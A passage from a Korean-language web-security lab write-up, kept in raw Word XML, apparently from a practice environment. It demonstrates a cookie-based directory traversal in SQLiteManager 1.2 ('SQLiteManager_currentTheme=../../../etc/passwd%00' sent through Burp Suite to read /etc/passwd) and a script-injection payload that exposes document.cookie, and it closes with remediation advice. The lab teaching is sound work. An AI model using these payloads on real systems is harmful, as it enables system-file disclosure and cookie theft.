    </w:p>
    <w:p w14:paraId="03D64D97" w14:textId="7C95FED9" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431" w:rsidP="00633431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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6184C14E" wp14:editId="1947CF14">
            <wp:extent cx="6840001" cy="737199"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="254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73719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5EC4F8" w14:textId="3B2DC3C6" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">VE </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">링크를 확인해보면 설명에 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>SQLiteManager 1.2. 버전에서 Directory Traversal 취약점이 존재하여 "SQLiteManager_currentTheme" 쿠키 안에 '..' 문자를 통해 임의의 파일을 읽을 수 있다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7E1AD" w14:textId="77476171" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697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해당 취약점에 대한 내용은 다음 링크에 상세하게 나와있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC5400" w14:textId="41C00083" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="007C0697" w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://www.securityfocus.com/bid/22727/info</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44A6DE51" w14:textId="08721EC5" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1322A4" w14:textId="0224B477" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552BE643" w14:textId="77777777" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71036F57" w14:textId="7194AE64" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431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5FB18567" wp14:editId="12D06CEC">
            <wp:extent cx="6840001" cy="1279641"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="158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27964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6D968C" w14:textId="424FAC5F" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00FB583C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첫 페이지로 </w:t>
      </w:r>
      <w:r w:rsidR="00633431" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">돌아가서 </w:t>
      </w:r>
      <w:r w:rsidR="00633431" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLiteManager </w:t>
      </w:r>
      <w:r w:rsidR="00633431" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">링크를 클릭하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트 </w:t>
      </w:r>
      <w:r w:rsidR="00640098" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00640098" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>통</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한 간단한 쿠키 탈취 실습부터 진행해보도록 하자.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA34D7" w14:textId="1FA5B527" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431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30B7C60C" wp14:editId="457863F6">
            <wp:extent cx="6840001" cy="2056056"/>
            <wp:effectExtent l="19050" t="19050" r="18415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056056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532E77" w14:textId="353E681D" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00633431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왼쪽 </w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>]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탭</w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 클릭 -</w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; [Add a new Trigger] </w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">클릭하여 스크립트 </w:t>
      </w:r>
      <w:r w:rsidR="00FB583C" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D50EB8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>수행한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EB5F0" w14:textId="1278D077" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8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64B03FDF" wp14:editId="28217A61">
            <wp:extent cx="6840001" cy="3503047"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="215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3503047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BAADBD" w14:textId="47E80397" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(document.cookie)&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE2E9A" w14:textId="7D3EA8E0" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E19EE5" w14:textId="15E95207" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8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32FC99FB" wp14:editId="6AB90F0D">
            <wp:extent cx="6840001" cy="2305277"/>
            <wp:effectExtent l="19050" t="19050" r="18415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30527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A5F535" w14:textId="5BBCD9CE" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8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쿠키 정보가 획득된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06670C4E" w14:textId="362CDF67" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8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쿠키 탈취는 모든 난이도에서 적용된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283351A" w14:textId="77777777" w:rsidR="00FB583C" w:rsidRPr="0035631E" w:rsidRDefault="00FB583C" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9E914B" w14:textId="511CDB7D" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="00D50EB8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이제</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB583C" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">처음 언급된 취약점을 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용</w:t>
      </w:r>
      <w:r w:rsidR="00FB583C" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하여</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 쿠키 변조를 통한 페이지의 반응을 살펴</w:t>
      </w:r>
      <w:r w:rsidR="00FB583C" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보겠다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E8AD2" w14:textId="1E5DFB17" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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32BBBB86" wp14:editId="2C768681">
            <wp:extent cx="6840001" cy="4087254"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="279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08725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765535" w14:textId="1DEE9842" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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S</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>QLiteManager</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 첫 페이지에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>intercept</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 켜준 뒤 새로고침하고 쿠키를 받아온다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07049424" w14:textId="77777777" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B" w:rsidP="00006D7B">
      <w:pPr>
        <w:ind w:left="200" w:hangingChars="100" w:hanging="20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쿠키 요청 패킷 헤더에 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“Cookie : …; SQLiteManager_currentTheme=../etc/passwd%00;”</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6553DD50" w14:textId="55B3D37D" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B" w:rsidP="007C0697">
      <w:pPr>
        <w:ind w:left="200" w:hangingChars="100" w:hanging="20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삽입하면서 F</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>orward</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89ABD3" w14:textId="14202217" w:rsidR="00D50EB8" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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%00은 NULL을 의미하며, "../etc/passwd" 뒤에 %00을 덧붙이는 이유는 쿠키가 전달되어 파일을 읽으려 시도할 때 뒤에 추가로 붙는 값들을 무시하기 위해서이다. 이 %00이 없으면 공격이 되지 않는다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97FF0B" w14:textId="39B1C1FE" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736BF7C0" w14:textId="14AB2202" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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12AB0C9B" wp14:editId="34433CD9">
            <wp:extent cx="6840001" cy="1667847"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="279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66784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4465AC" w14:textId="7E679B9D" w:rsidR="00006D7B" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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쿠키 변조 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>SQLiteManager</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지의 테마가 바뀐 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035B20B2" w14:textId="72420B6F" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B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 xml:space="preserve">‘../’ </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하나만으로는 루트 디렉터리까지 도달하지 못한 것으로 보이므로 많이 넣어 삽입해보자.</w:t>
      </w:r>
      <w:r w:rsidR="007C0697" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DEBFF" w14:textId="28D45BCF" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="00006D7B" w:rsidP="00633431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“Cookie : …; SQLiteManager_currentTheme=../../../../../../../../../../../</w:t>
      </w:r>
      <w:r w:rsidR="007C0697" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc/passwd%00;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DE206" w14:textId="75D2CD84" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="00633431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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68562112" wp14:editId="0FF517DB">
            <wp:extent cx="6840001" cy="1794118"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="158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79411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233F6F" w14:textId="4162D68E" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697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위 구문과 같이 변조 후 페이지 재요청을 하게 되면 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 파일의 내용이 출력되는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF90C6" w14:textId="77777777" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="007C0697">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EBB7FB" w14:textId="17A4B735" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="007C0697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</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점에 대한 해결 방법으로는 해당 쿠키(SQLiteManager_currentTheme)값을 검증하는 로직을 추가하거나SQLiteManager 버전을 업그레이드하는 것이 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11296E1C" w14:textId="77777777" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="007C0697">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5018E7" w14:textId="588EFC2F" w:rsidR="007C0697" w:rsidRPr="0035631E" w:rsidRDefault="007C0697" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006D8E11" w14:textId="05EFC060" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B3DE11" w14:textId="645B2A8B" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187BF475" w14:textId="665DFDCD" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDE7E62" w14:textId="78A3586E" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D846434" w14:textId="4B04FCA0" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195C68E2" w14:textId="09306904" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213979CC" w14:textId="35025B8E" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367F2543" w14:textId="46C54A8A" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C969C0" w14:textId="5EEAA784" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2958B4" w14:textId="2C3CE4DB" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37247BF4" w14:textId="0DB403AE" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00C21A23" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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C21A23" w:rsidRPr="0035631E" w14:paraId="533BA7FF" w14:textId="77777777" w:rsidTr="008046E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bookmarkStart w:id="13" w:name="E2"/>
          <w:bookmarkEnd w:id="13"/>
          <w:p w14:paraId="1EC6FF44" w14:textId="694E04AA" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6" w:rsidP="008046EE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40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lastRenderedPageBreak/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instrText xml:space="preserve"> HYPERLINK  \l "E1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separate"/>
            </w:r>
            <w:r w:rsidR="00613C38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0"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00613C3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. Remote &amp; Loca</w:t>
            </w:r>
